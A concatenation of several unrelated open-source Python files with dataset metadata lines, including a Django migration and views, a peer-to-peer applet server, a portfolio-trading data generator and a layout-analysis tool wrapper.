import django.db.models.deletion
import django.utils.timezone
import django_extensions.db.fields
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.CharField(max_length=200, verbose_name='question')),
('position', models.IntegerField(verbose_name='position')),
],
options={
'verbose_name': 'question',
'verbose_name_plural': 'questions',
'ordering': ('position',),
},
),
migrations.CreateModel(
name='Type',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
('header', models.CharField(max_length=200, verbose_name='main header')),
('rating_header', models.CharField(blank=True, max_length=200, verbose_name='rating header')),
('comment_header', models.CharField(blank=True, max_length=200, verbose_name='comment header')),
('response_header', models.CharField(blank=True, max_length=200, verbose_name='response header')),
('rating_enabled', models.BooleanField(default=True, verbose_name='rating enabled')),
('comment_enabled', models.BooleanField(default=True, verbose_name='comment enabled')),
('notification_enabled', models.BooleanField(default=True, verbose_name='notification enabled')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'communication type',
'verbose_name_plural': 'communication types',
},
managers=[
('objects', bettertexts.models.TypeManager()),
('on_site', django.contrib.sites.managers.CurrentSiteManager()),
],
),
migrations.CreateModel(
name='TextComment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_pk', models.TextField(verbose_name='object ID')),
('user_name', models.CharField(blank=True, max_length=50, verbose_name="user's name")),
('user_email', models.EmailField(blank=True, max_length=254, verbose_name="user's email address")),
('user_url', models.URLField(blank=True, verbose_name="user's URL")),
('inform', models.BooleanField(default=False, help_text='Check this box to keep me informed about updates.', verbose_name='Keep informed')),
('involved', models.BooleanField(default=False, help_text='Check this box to make more texts better.', verbose_name='Stay involved')),
('comment', models.TextField(max_length=3000, verbose_name='comment')),
('submit_date', models.DateTimeField(default=None, verbose_name='date/time submitted')),
('ip_address', models.GenericIPAddressField(blank=True, null=True, unpack_ipv4=True, verbose_name='IP address')),
('is_public', models.BooleanField(default=True, help_text='Uncheck this box to make the comment effectively disappear from the site.', verbose_name='is public')),
('is_removed', models.BooleanField(default=False, help_text='Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead.', verbose_name='is removed')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content_type_set_for_textcomment', to='contenttypes.ContentType', verbose_name='content type')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='textcomment_comments', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'verbose_name': 'comment',
'verbose_name_plural': 'comments',
'ordering': ('submit_date',),
'permissions': [('can_moderate', 'Can moderate comments')],
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='title')),
('slug', django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True, verbose_name='slug')),
('intro', ckeditor.fields.RichTextField(blank=True, max_length=20000, verbose_name='intro')),
('body', ckeditor.fields.RichTextField(max_length=20000, verbose_name='text')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('pub_date', models.DateTimeField(auto_now_add=True, verbose_name='date published')),
('end_date', models.DateTimeField(blank=True, null=True, verbose_name='date end')),
('site', models.ForeignKey(default=1, editable=False, on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type')),
],
options={
'verbose_name': 'text',
'verbose_name_plural': 'texts',
},
managers=[
('objects', bettertexts.models.TypeManager()),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('range', models.PositiveIntegerField(default=10, verbose_name='range')),
('count', models.PositiveIntegerField(default=0, verbose_name='count')),
('total', models.PositiveIntegerField(default=0, verbose_name='total')),
('average', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=6, verbose_name='average')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Question', verbose_name='Question')),
('text', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Text')),
],
options={
'verbose_name': 'rating',
'verbose_name_plural': 'ratings',
'unique_together': {('text', 'version', 'question')},
},
),
migrations.AddField(
model_name='question',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type'),
),
migrations.CreateModel(
name='UserRating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('user', models.CharField(max_length=200)),
('ip', models.GenericIPAddressField(blank=True, null=True)),
('score', models.PositiveSmallIntegerField()),
('rating', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='user_ratings', to='bettertexts.Rating')),
],
options={
'unique_together': {('user', 'rating')},
},
),
]
| 1.742188 | 2 |
SLpackage/private/pacbio/pythonpkgs/pbsmrtpipe/lib/python2.7/site-packages/pbsmrtpipe/__init__.py | fanglab/6mASCOPE | 5 | 12786773 | <filename>SLpackage/private/pacbio/pythonpkgs/pbsmrtpipe/lib/python2.7/site-packages/pbsmrtpipe/__init__.py<gh_stars>1-10
from __future__ import absolute_import, division, print_function
VERSION = '1.4.0'
def get_version():
return VERSION
__version__ = get_version()
def get_changelist():
# Legacy from the perforce era, but keeping this. It's not worth breaking
return "UnknownChangelist"
| 1.421875 | 1 |
cspace/main/appletserver.py | jmcvetta/cspace | 28 | 12786774 | <filename>cspace/main/appletserver.py
import os, sys, threading
from string import Template
from ncrypt.rand import bytes as rand_bytes
from ncrypt.rsa import RSAKey, RSAError
from nitro.selectreactor import SelectReactor
from nitro.tcp import tcpListen, TCPStream
from nitro.ssl import sslAbort
from nitro.linestream import TCPLineStream
from cspace.util.spawn import spawnProcess
from cspace.util.hexcode import hexEncode, hexDecode, HexDecodeError
from cspace.util.wordcode import wordEncode, wordDecode, WordDecodeError
from cspace.util.settings import getAppDir
from cspace.util.queue import ThreadQueue
from cspace.main.common import localSettings, appSettings, \
isValidUserName, isValidServiceName
from cspace.main.sslbridge import SSLBridge
def _substituteMetaVars( s ) :
if sys.platform == 'win32' :
_metaDict = dict( python='python.exe', pythonw='pythonw.exe' )
else :
_metaDict = dict( python='python', pythonw='python' )
_metaDict['approot'] = getAppDir()
return Template( s ).safe_substitute( _metaDict )
def _readCommand( settings, entryPath ) :
data = settings.getData( entryPath ).strip()
lines = [line.strip() for line in data.split('\n')]
return lines
class ServiceConfig( object ) :
def _listServices( self, settings ) :
services = []
for entry in settings.listEntries('Services') :
serviceName = entry.split('/')[-1]
assert isValidServiceName(serviceName)
serviceCommand = _readCommand( settings, entry )
services.append( (serviceName,serviceCommand) )
return services
def listSystemServices( self ) :
return self._listServices( appSettings() )
def listUserServices( self ) :
return self._listServices( localSettings() )
def listActiveServices( self ) :
sysServices = self.listSystemServices()
userServices = self.listUserServices()
serviceDict = {}
out = []
for x in userServices+sysServices :
if x[0] in serviceDict : continue
serviceDict[x[0]] = x
out.append( x )
return out
class ActionConfig( object ) :
def _listActions( self, settings ) :
actions = []
for entry in settings.listEntries('ContactActions') :
actionDir = entry.split('/')[-1]
assert isValidServiceName(actionDir)
actionName = settings.getData( entry+'/Action' ).strip()
actionCommand = _readCommand( settings, entry+'/Command' )
actionOrder = settings.getInt(entry+'/SortOrder',10000)
actions.append( (actionDir,actionName,actionCommand,actionOrder) )
return actions
def listSystemActions( self ) :
return self._listActions( appSettings() )
def listUserActions( self ) :
return self._listActions( localSettings() )
def listActiveActions( self ) :
sysActions = self.listSystemActions()
userActions = self.listUserActions()
actionDict = {}
out = []
for x in userActions+sysActions :
if x[0] in actionDict : continue
actionDict[x[0]] = x
out.append( x )
return out
class BridgeThread( threading.Thread ) :
def __init__( self ) :
threading.Thread.__init__( self )
self.reactor = SelectReactor()
self.threadQueue = ThreadQueue( self._onMessage, self.reactor )
self.bridges = {}
self.start()
def _onMessage( self, msg ) :
cmd,args = msg[0],msg[1:]
if cmd == 'bridge' :
sock,sslConn = args
bridge = SSLBridge( sock, sslConn, self.reactor )
self.bridges[bridge] = 1
bridge.setCloseCallback( lambda : self._onBridgeClosed(bridge) )
elif cmd == 'clear' :
for b in self.bridges.keys() :
b.shutdown()
self.bridges.clear()
elif cmd == 'stop' :
for b in self.bridges.keys() :
b.shutdown()
self.bridges.clear()
self.reactor.stop()
def _onBridgeClosed( self, bridge ) :
del self.bridges[bridge]
def run( self ) :
self.reactor.run()
class AppletConnection( object ) :
DEFAULT = 0
CONNECTING = 1
WAITING_BRIDGE = 2
LISTENER = 3
CLOSED = 4
def __init__( self, sock, reactor, appletServer ) :
self.reactor = reactor
self.stream = TCPLineStream( sock, reactor )
self.appletServer = appletServer
self.appletServer.appletConnections[self] = 1
self.session = appletServer.session
self.incoming = appletServer.incoming
self.state = self.DEFAULT
self._writeData = self.stream.writeData
rt = {}
self.requestTable = rt
rt['echo'] = self._doEcho
rt['getcontacts'] = self._doGetContacts
rt['getpubkey'] = self._doGetPubKey
rt['getcontactpubkeys'] = self._doGetContactPubKeys
rt['connect'] = self._doConnect
rt['connectpubkey'] = self._doConnectPubKey
rt['accept'] = self._doAccept
rt['getincomingpubkey'] = self._doGetIncomingPubKey
rt['registerlistener'] = self._doRegisterListener
rt['sendlistener'] = self._doSendListener
self.stream.setInputCallback( self._onInput )
self.stream.setCloseCallback( self._onClose )
self.stream.setErrorCallback( self._onError )
self.stream.enableRead( True )
def _setClosed( self ) :
del self.appletServer.appletConnections[self]
self.state = self.CLOSED
def shutdown( self, deferred=False ) :
if self.state == self.CONNECTING :
self.connectOp.cancel()
elif self.state == self.LISTENER :
self.appletServer.unregisterListener( self.listenerName )
elif self.state == self.WAITING_BRIDGE :
sslAbort( self.peerSSLConn )
self.stream.close( deferred )
self._setClosed()
def _onClose( self ) :
self.shutdown()
def _onError( self, err, errMsg ) :
self.shutdown()
def _writeLine( self, line ) :
self._writeData( line + '\r\n' )
def _writeWords( self, words ) :
words = [wordEncode(w) for w in words]
self._writeData( ' '.join(words) + '\r\n' )
def _writeError( self, msg ) :
self._writeLine( 'ERROR %s' % msg )
def _writeResult( self, words ) :
self._writeWords( ['OK'] + words )
def dispatchMessage( self, msg ) :
assert self.state == self.LISTENER
self._writeWords( ['MSG'] + msg )
def _doEcho( self, words ) :
self._writeResult( words )
def _doGetContacts( self, words ) :
if len(words) != 0 :
self._writeError( 'Malformed request' )
return
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
names = self.session.getProfile().getContactNames()
self._writeResult( [c.getNickName() for c in contacts] )
def _doGetPubKey( self, words ) :
if len(words) > 1 :
self._writeError( 'Malformed request' )
return
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
if len(words) == 0 :
keyData = self.session.getProfile().rsaKey.toDER_PublicKey()
self._writeResult( [hexEncode(keyData)] )
return
contact = self.session.getProfile().getContactByName( words[0] )
if contact is None :
self._writeError( 'Unknown contact' )
return
self._writeResult( [hexEncode(contact.publicKeyData)] )
def _doGetContactPubKeys( self, words ) :
if len(words) != 0 :
self._writeError( 'Malformed request' )
return
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
out = []
profile = self.session.getProfile()
for name in profile.getContactNames() :
c = profile.getContactByName( name )
out.extend( [c.name,hexEncode(c.publicKeyData)] )
self._writeResult( out )
def _connectInternal( self, publicKey, service ) :
def onWriteComplete() :
self.stream.shutdown()
sock = self.stream.getSock()
self.appletServer.bridgeThread.threadQueue.postMessage(
('bridge',sock,self.peerSSLConn) )
self._setClosed()
def onConnect( err, sslConn ) :
if err < 0 :
self._writeError( 'Connect failed' )
self.state = self.DEFAULT
return
self._writeResult( ['Connected'] )
self.peerSSLConn = sslConn
self.state = self.WAITING_BRIDGE
self.stream.enableRead( False )
self.stream.setWriteCompleteCallback( onWriteComplete )
self.connectOp = self.session.connectTo( publicKey, service,
onConnect )
self.state = self.CONNECTING
def _doConnect( self, words ) :
if len(words) != 2 :
self._writeError( 'Malformed request' )
return
contactName, service = words
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
contact = self.session.getProfile().getContactByName( contactName )
if not contact :
self._writeError( 'Unknown contact' )
return
self._connectInternal( contact.publicKey, service )
def _doConnectPubKey( self, words ) :
if len(words) != 2 :
self._writeError( 'Malformed request' )
return
hexPubKey, service = words
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
try :
pubKeyData = hexDecode( hexPubKey )
pubKey = RSAKey()
pubKey.fromDER_PublicKey( pubKeyData )
except (HexDecodeError,RSAError) :
self._writeError( 'Malformed publickey' )
return
self._connectInternal( pubKey, service )
def _doAccept( self, words ) :
if len(words) != 1 :
self._writeError( 'Malformed request' )
return
connectionId = words[0]
sslConn = self.incoming.acceptIncoming( connectionId )
if not sslConn :
self._writeError( 'Invalid connection' )
return
self._writeResult( ['Connected'] )
self.peerSSLConn = sslConn
self.state = self.WAITING_BRIDGE
self.stream.enableRead( False )
def onWriteComplete() :
self.stream.shutdown()
sock = self.stream.getSock()
self.appletServer.bridgeThread.threadQueue.postMessage(
('bridge',sock,self.peerSSLConn) )
self._setClosed()
self.stream.setWriteCompleteCallback( onWriteComplete )
def _doGetIncomingPubKey( self, words ) :
if len(words) != 1 :
self._writeError( 'Malformed request' )
return
connectionId = words[0]
peerKey = self.incoming.getPeerKey( connectionId )
if not peerKey :
self._writeError( 'Invalid connection' )
return
self._writeResult( [hexEncode(peerKey.toDER_PublicKey())] )
def _doRegisterListener( self, words ) :
if len(words) != 1 :
self._writeError( 'Malformed request' )
return
listenerName = words[0]
result = self.appletServer.registerListener( listenerName, self )
if not result :
self._writeError( 'Listener already registered' )
return
self.listenerName = listenerName
self.state = self.LISTENER
self._writeResult( ['Registered'] )
def _doSendListener( self, words ) :
if len(words) <= 1 :
self._writeError( 'Malformed request' )
return
listenerName = words[0]
listener = self.appletServer.getListener( listenerName )
if listener is None :
self._writeError( 'No such listener' )
return
listener.dispatchMessage( words[1:] )
self._writeResult( ['Sent'] )
def _onInput( self, line ) :
assert self.state in (self.DEFAULT,self.CONNECTING,self.LISTENER)
if self.state in (self.CONNECTING,self.LISTENER) :
self._writeError( 'Junk received' )
self.shutdown( deferred=True )
return
words = line.strip().split()
if len(words) == 0 : return
try :
words = [wordDecode(w) for w in words]
except WordDecodeError :
self._writeError( 'Malformed request' )
return
cmd = words[0].lower()
handler = self.requestTable.get( cmd, None )
if not handler :
self._writeError( 'Unknown request' )
return
handler( words[1:] )
class IncomingConnections( object ) :
def __init__( self, reactor ) :
self.reactor = reactor
self.connections = {}
def clearConnections( self ) :
for sslConn,peerKey,timerOp in self.connections.values() :
sslAbort( sslConn )
timerOp.cancel()
self.connections.clear()
def addIncoming( self, sslConn, peerKey ) :
while True :
connectionId = hexEncode( rand_bytes(8) )
if connectionId not in self.connections : break
def onTimeout() : self._onTimeout( connectionId )
timerOp = self.reactor.callLater( 30, onTimeout )
self.connections[connectionId] = (sslConn,peerKey,timerOp)
return connectionId
def acceptIncoming( self, connectionId ) :
info = self.connections.pop( connectionId, None )
if info is None :
return None
sslConn,peerKey,timerOp = info
timerOp.cancel()
return sslConn
def getPeerKey( self, connectionId ) :
info = self.connections.get( connectionId )
if info is None :
return None
return info[1]
def _onTimeout( self, connectionId ) :
sslConn,peerKey,timerOp = self.connections.pop( connectionId )
sslAbort( sslConn )
class AppletServer( object ) :
def __init__( self, session, actionManager, reactor ) :
self.session = session
self.actionManager = actionManager
self.reactor = reactor
self.listener = tcpListen( ('127.0.0.1',0), reactor, self._onNewConnection )
self.listenPort = self.listener.getSock().getsockname()[1]
print 'listenport = %d' % self.listenPort
self.serviceConfig = ServiceConfig()
self.actionConfig = ActionConfig()
self.listeners = {}
self.incoming = IncomingConnections( self.reactor )
self.services = []
self.appletConnections = {}
for (service,command) in self.serviceConfig.listActiveServices() :
def doRegisterService( service, command ) :
def onService( sslConn, peerKey, contactName, incomingName ) :
self._onService( service, command, sslConn,
peerKey, contactName, incomingName )
self.session.registerService( service, onService )
doRegisterService( service, command )
self.services.append( service )
self.actions = []
for (actionDir,action,command,order) in self.actionConfig.listActiveActions() :
def doRegisterAction( actionDir, action, command, order ) :
def onAction( contactName ) :
self._onAction( actionDir, action, command, contactName )
return self.actionManager.registerAction( action, onAction, order )
actionId = doRegisterAction( actionDir, action, command, order )
self.actions.append( actionId )
if actionDir == 'TextChat' :
self.actionManager.setDefaultAction( actionId )
self.bridgeThread = BridgeThread()
def shutdown( self ) :
self.incoming.clearConnections()
appletConns = self.appletConnections.keys()
for conn in appletConns :
conn.shutdown()
self.bridgeThread.threadQueue.postMessage( ('stop',) )
self.bridgeThread.join()
self.listener.close()
def clearConnections( self ) :
self.incoming.clearConnections()
appletConns = self.appletConnections.keys()
for conn in appletConns :
conn.shutdown()
self.bridgeThread.threadQueue.postMessage( ('clear',) )
def getListenPort( self ) : return self.listenPort
def registerListener( self, name, connection ) :
conn = self.listeners.setdefault( name, connection )
return conn is connection
def unregisterListener( self, name ) :
del self.listeners[name]
def getListener( self, name ) :
return self.listeners.get( name, None )
def _onNewConnection( self, sock ) :
AppletConnection( sock, self.reactor, self )
def _findProgram( self, relPath ) :
dirList = os.environ.get( 'PATH', '' ).split( ';' )
for d in dirList :
p = os.path.join( d, relPath )
if os.path.isfile(p) :
return p
return relPath
def _runCommand( self, command, envNew ) :
env = dict( os.environ.items() )
env.update( envNew )
cmdLine = [_substituteMetaVars(x) for x in command]
p = os.path.join( getAppDir(), cmdLine[0] )
if not os.path.isfile(p) :
p = self._findProgram( cmdLine[0] )
args = [p] + cmdLine[1:]
startingDir = os.getcwd()
result = spawnProcess( p, args, env, startingDir, 0 )
if not result :
print 'error starting command (%s)' % p
def _onService( self, service, command, sslConn, peerKey,
contactName, incomingName ) :
print '_onService( service=%s command=%s from=(%s,%s) )' % (
service, command, contactName, incomingName )
connectionId = self.incoming.addIncoming( sslConn, peerKey )
env = {}
env['CSPACE_PORT'] = str(self.listenPort)
env['CSPACE_USER'] = self.session.getProfile().name
env['CSPACE_EVENT'] = 'INCOMING'
env['CSPACE_SERVICE'] = service
env['CSPACE_CONNECTIONID'] = connectionId
env['CSPACE_CONTACTNAME'] = contactName
env['CSPACE_INCOMINGNAME'] = incomingName
self._runCommand( command, env )
def _onAction( self, actionDir, action, command, contactName ) :
print '_onAction( actionDir=%s, action=%s, command=%s, contact=%s )' % (
actionDir, action, command, contactName )
env = {}
env['CSPACE_PORT'] = str(self.listenPort)
env['CSPACE_USER'] = self.session.getProfile().name
env['CSPACE_EVENT'] = 'CONTACTACTION'
env['CSPACE_CONTACTNAME'] = contactName
env['CSPACE_ACTIONDIR'] = actionDir
env['CSPACE_ACTION'] = action
self._runCommand( command, env )
| 2.046875 | 2 |
trading_gym/envs/portfolio_gym/data_generator.py | zhaoshiying97/trading_gym | 32 | 12786775 | <reponame>zhaoshiying97/trading_gym<filename>trading_gym/envs/portfolio_gym/data_generator.py
import numpy as np
import pandas as pd
import pdb
class DataGeneratorDF(object):
"""input is a DataFrame with MultiIndex, considering Panal data structure is depreciated after pandas=0.24"""
def __init__(self, data_df, sequence_window=2, add_cash=False, risk_free_return=0.0001):
data_df = data_df.rename_axis(["order_book_id","datetime"])
self.data_df = data_df
self.order_book_ids = list(data_df.index.levels[0])
self.trading_dates = list(data_df.index.levels[1])
self.number_feature = len(data_df.columns) -1
self.sequence_window = sequence_window
self.add_cash = add_cash
self.risk_free_return = risk_free_return
def step(self):
self.idx += 1
dt = self.trading_dates[self.idx-1]
if dt == self.trading_dates[-1]:
done = True
else:
done = False
state, one_step_fwd_returns = self._step(dt)
return state, one_step_fwd_returns, dt, done
def _step(self, dt):
idx = self.trading_dates.index(dt)+1
trading_dates_slice = self.trading_dates[idx - self.sequence_window: idx]
total_state = self.data_df.loc[(self.order_book_ids, trading_dates_slice),:]
#pdb.set_trace()
# fillna to a balanced panel data
total_state = total_state.unstack().stack(dropna=False)
# state
state = total_state.iloc[:,:self.number_feature]
# one_step_fwd_returns
one_step_fwd_returns = total_state.xs(dt, level="datetime").iloc[:,-1]
one_step_fwd_returns.name = "returns at {}".format(dt)
#pdb.set_trace()
if self.add_cash:
multi_index = pd.MultiIndex.from_tuples([("CASH", i) for i in trading_dates_slice])
df_cash = pd.DataFrame(1, index=multi_index, columns=state.columns)
state = pd.concat([state, df_cash])
one_step_fwd_returns.loc["CASH"] = self.risk_free_return
return state, one_step_fwd_returns
def reset(self):
self.idx = self.sequence_window
first_date = self.trading_dates[self.idx-1]
state, one_step_fwd_returns = self._step(first_date)
return state
class DataGeneratorNP(object):
def __init__(self, data_np, order_book_ids, trading_dates, sequence_window=None, risk_free_return=0.0001):
number_order_book_id, total_dates, num_feature = data_np.shape
self.number_feature = num_feature
self._data = data_np
self.order_book_ids = order_book_ids
self.trading_dates = trading_dates
self.sequence_window = sequence_window
self.risk_free_return= risk_free_return
def step(self):
self.steps += 1
self.idx = self.steps + self.sequence_window
next_state = self._data[:,self.idx - self.sequence_window: self.idx, :self.number_feature-1]
dt = self.trading_dates[self.idx-1]
one_step_fwd_returns = self._data[:,self.idx-1, self.number_feature-1]
one_step_fwd_returns = pd.Series(index=self.order_book_ids, data=one_step_fwd_returns)
one_step_fwd_returns.loc["CASH"] = self.risk_free_return
return next_state, one_step_fwd_returns, dt
def reset(self):
self.steps = 0
self.idx = self.steps + self.sequence_window
dt = self.trading_dates[self.idx]
#pdb.set_trace()
state = self._data[:,self.idx - self.sequence_window: self.idx, :self.number_feature-1]
return state
if __name__ == "__main__":
pass
# order_book_ids = ["000001.XSHE","000002.XSHE"]
# total_dates = 20
# number_feature = 4 # contain returns
# sequence_window = 2
#
# data = np.random.randn(len(order_book_ids),total_dates, number_feature)
#
# data_generator = DataGenerator(data_np=data, order_book_ids=order_book_ids,trading_dates=list(range(1,total_dates+1)),sequence_window=sequence_window)
#
# state = data_generator.reset()
# next_state, one_step_fwd_returns, dt = data_generator.step()
| 2.921875 | 3 |
dsaii/views.py | khushi0205/DSAII | 0 | 12786776 | from django.shortcuts import render
from django.views import View
from django.views.generic import ListView, DetailView, CreateView
from django.http import HttpResponseRedirect
from .models import Post, Comments, Event, EveComm
from django.urls import reverse_lazy, reverse
from django.core.mail import send_mail
from django.conf import settings
import datetime
from .forms import CommentForm, CF
class Index(View):
def get(self, request, *args, **kwargs):
return render(request, 'index.html')
class Quiz(View):
def get(self, request, *args, **kwargs):
return render(request, 'quiz.html')
class Inaug(View):
def get(self, request, *args, **kwargs):
return render(request, 'inauguration.html')
class CodHr(View):
def get(self, request, *args, **kwargs):
return render(request, 'codinghr.html')
class Blogs(ListView):
model = Post
template_name = 'blogs.html'
class Events(ListView):
#model = Event
#template_name = 'events.html'
def get(self, request, *args, **kwargs):
return render(request, 'events.html')
class Eve(ListView):
model = Event
template_name = 'eve.html'
class Article(DetailView):
model = Post
template_name = 'article.html'
class Team(View):
def get(self, request, *args, **kwargs):
return render(request, 'about.html')
class Login(View):
def get(self, request, *args, **kwargs):
return render(request, 'l1.html')
class AddC(CreateView):
model = Comments
form_class = CommentForm
template_name = 'addcomm.html'
#fields = '__all__'
def form_valid(self, form):
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
succes_url = reverse_lazy('blogs')
class EveC(CreateView):
model = EveComm
form_class = CF
template_name = 'addcomm.html'
# fields = '__all__'
def form_valid(self, form):
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
succes_url = reverse_lazy('events')
| 2.09375 | 2 |
mud/admin.py | lambda-mud-cs18/backend | 1 | 12786777 | <reponame>lambda-mud-cs18/backend<filename>mud/admin.py<gh_stars>1-10
from django.contrib import admin
from .models import Player, PlayerInventory, Item, Team, Map, Room
# Register your models here.
admin.site.register(Player)
admin.site.register(PlayerInventory)
admin.site.register(Item)
admin.site.register(Team)
admin.site.register(Map)
admin.site.register(Room) | 1.601563 | 2 |
TranskribusDU/tasks/performCVLLA.py | Transkribus/TranskribusDU | 20 | 12786778 | # -*- coding: utf-8 -*-
"""
performCVLLA.py
create profile for nomacs (CVL LA toolkit)
<NAME>
copyright Xerox 2017
READ project
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
import sys, os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
import glob
import common.Component as Component
from common.trace import traceln
from xml_formats.PageXml import PageXml
from xml_formats.PageXml import MultiPageXml
from util.Polygon import Polygon
from lxml import etree
class LAProcessor(Component.Component):
"""
"""
usage = ""
version = "v.01"
description = "description: Nomacs LA processor"
if sys.platform == 'win32':
cNomacs = '"C:\\Program Files\\READFramework\\bin\\nomacs.exe"'
else:
cNomacs = "/opt/Tools/src/tuwien-2017/nomacs/nomacs"
cCVLLAProfile = """
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\General\\useTextRegions=%s
PluginBatch\LayoutPlugin\Layout Analysis Module\computeSeparators=true
PluginBatch\LayoutPlugin\Layout Analysis Module\localBlockOrientation=false
PluginBatch\LayoutPlugin\Layout Analysis Module\maxImageSide=3000
PluginBatch\LayoutPlugin\Layout Analysis Module\minSuperPixelsPerBlock=15
PluginBatch\LayoutPlugin\Layout Analysis Module\\removeWeakTextLines=true
PluginBatch\LayoutPlugin\Layout Analysis Module\scaleMode=1
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\pluginList=Layout Analysis | Layout Analysis
SaveInfo\Compression=-1
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
SaveInfo\Mode=2
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Layout Analysis Module\\removeWeakTextLines=true
"""
#PluginBatch\pluginList="Layout Analysis | Layout Analysis;Layout Analysis | Detect Lines"
cCVLLASeparatorProfile="""
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
PluginBatch\pluginList=Layout Analysis | Detect Separator Lines
PluginBatch\LayoutPlugin\General\\useTextRegions=false
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
"""
cCVLProfileTabReg ="""
[%%General]
FileList="%s"
OutputDirPath="%s"
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
PluginBatch\pluginList=Forms Analysis | Apply template (Match)
PluginBatch\FormAnalysis\FormFeatures\\formTemplate="%s"
PluginBatch\FormAnalysis\FormFeatures\distThreshold=200
PluginBatch\FormAnalysis\FormFeatures\colinearityThreshold=20
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdLower=0.5
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdUpper=0.55
PluginBatch\FormAnalysis\FormFeatures\saveChilds=false
"""
# cCVLProfileTabReg ="""
# [%%General]
# FileList="%s"
# OutputDirPath="%s"
# FileNamePattern=<c:0>.<old>
# SaveInfo\Compression=-1
# SaveInfo\Mode=2
# SaveInfo\DeleteOriginal=false
# SaveInfo\InputDirIsOutputDir=true
# PluginBatch\pluginList=Forms Analysis | Apply template (Match)
# PluginBatch\FormAnalysis\FormFeatures\\formTemplate="%s"
# PluginBatch\FormAnalysis\FormFeatures\distThreshold=200
# PluginBatch\FormAnalysis\FormFeatures\colinearityThreshold=20
# PluginBatch\FormAnalysis\FormFeatures\\variationThresholdLower=0.5
# PluginBatch\FormAnalysis\FormFeatures\\variationThresholdUpper=0.55
# PluginBatch\FormAnalysis\FormFeatures\saveChilds=false
# """
#--- INIT -------------------------------------------------------------------------------------------------------------
def __init__(self):
"""
Always call first the Component constructor.
"""
Component.Component.__init__(self, "tableProcessor", self.usage, self.version, self.description)
self.coldir = None
self.docid= None
self.bKeepRegion = False
self.bKeepTL=False
self.bTemplate = False
